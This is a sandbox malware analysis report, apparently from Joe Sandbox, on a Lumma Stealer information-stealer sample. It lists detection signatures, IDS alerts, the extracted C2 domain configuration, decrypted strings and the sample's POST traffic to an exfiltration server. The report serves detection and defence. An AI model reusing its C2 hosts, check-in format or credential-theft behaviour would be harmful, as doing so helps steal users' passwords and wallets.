Windows Analysis Report
xNuh0DUJaG.exe

Overview

General Information

Sample name: xNuh0DUJaG.exe (renamed because the original name is a hash value)
Original sample name: 9b3e0c8c483f0708b9dc9c18ce46d0bc.exe
Analysis ID: 1588972
MD5: 9b3e0c8c483f0708b9dc9c18ce46d0bc
SHA1: fd95369082e2b869b184391aa9268fa64370f4a7
SHA256: 4cf2d30c19e0ff537140c8717e72a8eb54a19ba9c27ce45adc7c790fc51d0549
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • xNuh0DUJaG.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\xNuh0DUJaG.exe" MD5: 9B3E0C8C483F0708B9DC9C18CE46D0BC)
    • WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "robinsharez.shop", "handscreamny.shop", "skidjazzyric.click", "femalsabler.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: xNuh0DUJaG.exe PID: 7464 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: xNuh0DUJaG.exe PID: 7464 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(2 further entries not shown)

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T07:48:33.213889+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49706 | 104.102.49.254 | 443 | TCP
2025-01-11T07:48:34.606386+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.696742+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:37.383901+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49725 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:38.663034+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49734 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:40.133319+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49743 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.051514+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:36.204096+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:35.051514+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49708 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:36.204096+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49714 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:32.480487+0100 | 2059035 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 50081 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.512095+0100 | 2059037 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 62827 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.490806+0100 | 2059039 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 58750 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.465985+0100 | 2059041 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 61213 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.522301+0100 | 2059043 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 50661 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.532793+0100 | 2059049 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 61203 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.441646+0100 | 2059088 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 51184 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.453201+0100 | 2059051 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 53181 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:32.501329+0100 | 2059057 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 63928 | 1.1.1.1 | 53 | UDP
2025-01-11T07:48:38.017404+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49725 | 104.21.80.1 | 443 | TCP
2025-01-11T07:48:33.974147+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49706 | 104.102.49.254 | 443 | TCP

            AV Detection

Source: xNuh0DUJaG.exe | Avira: detected
Source: https://sputnik-1985.com/apiOSCz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apieB | Avira URL Cloud: Label: malware
Source: 3.3.xNuh0DUJaG.exe.2150000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "robinsharez.shop", "handscreamny.shop", "skidjazzyric.click", "femalsabler.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}
Source: xNuh0DUJaG.exe | Virustotal: Detection: 48%
Source: xNuh0DUJaG.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: xNuh0DUJaG.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: robinsharez.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: handscreamny.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: chipdonkeruz.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: versersleep.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crowdwarek.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: apporholis.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: femalsabler.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: soundtappysk.shop
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: skidjazzyric.click
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4h5VfH--
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Code function: 3_2_00415720 CryptUnprotectData, 3_2_00415720

            Compliance

Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Unpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack
Source: xNuh0DUJaG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49743 version: TLS 1.2
Source: C:\Users\user\Desktop\xNuh0DUJaG.exe | Directory queried: number of queries: 1001

            Networking

            Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.10:53181 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.10:63928 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.10:62827 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.10:61213 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.10:58750 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.10:61203 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.10:50081 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.10:51184 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.10:50661 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49706 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49725 -> 104.21.80.1:443
            Source: Malware configuration extractorURLs: chipdonkeruz.shop
            Source: Malware configuration extractorURLs: versersleep.shop
            Source: Malware configuration extractorURLs: crowdwarek.shop
            Source: Malware configuration extractorURLs: robinsharez.shop
            Source: Malware configuration extractorURLs: handscreamny.shop
            Source: Malware configuration extractorURLs: skidjazzyric.click
            Source: Malware configuration extractorURLs: femalsabler.shop
            Source: Malware configuration extractorURLs: soundtappysk.shop
            Source: Malware configuration extractorURLs: apporholis.shop
            Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49714 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49706 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49734 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49743 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49725 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OG13XW2VA62H57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=86RQ8NVHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15009Host: sputnik-1985.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I3XGM3M5HS6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20389Host: sputnik-1985.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
            Source: global trafficDNS traffic detected: DNS query: soundtappysk.shop
            Source: global trafficDNS traffic detected: DNS query: femalsabler.shop
            Source: global trafficDNS traffic detected: DNS query: apporholis.shop
            Source: global trafficDNS traffic detected: DNS query: crowdwarek.shop
            Source: global trafficDNS traffic detected: DNS query: versersleep.shop
            Source: global trafficDNS traffic detected: DNS query: chipdonkeruz.shop
            Source: global trafficDNS traffic detected: DNS query: handscreamny.shop
            Source: global trafficDNS traffic detected: DNS query: robinsharez.shop
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1348198663.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
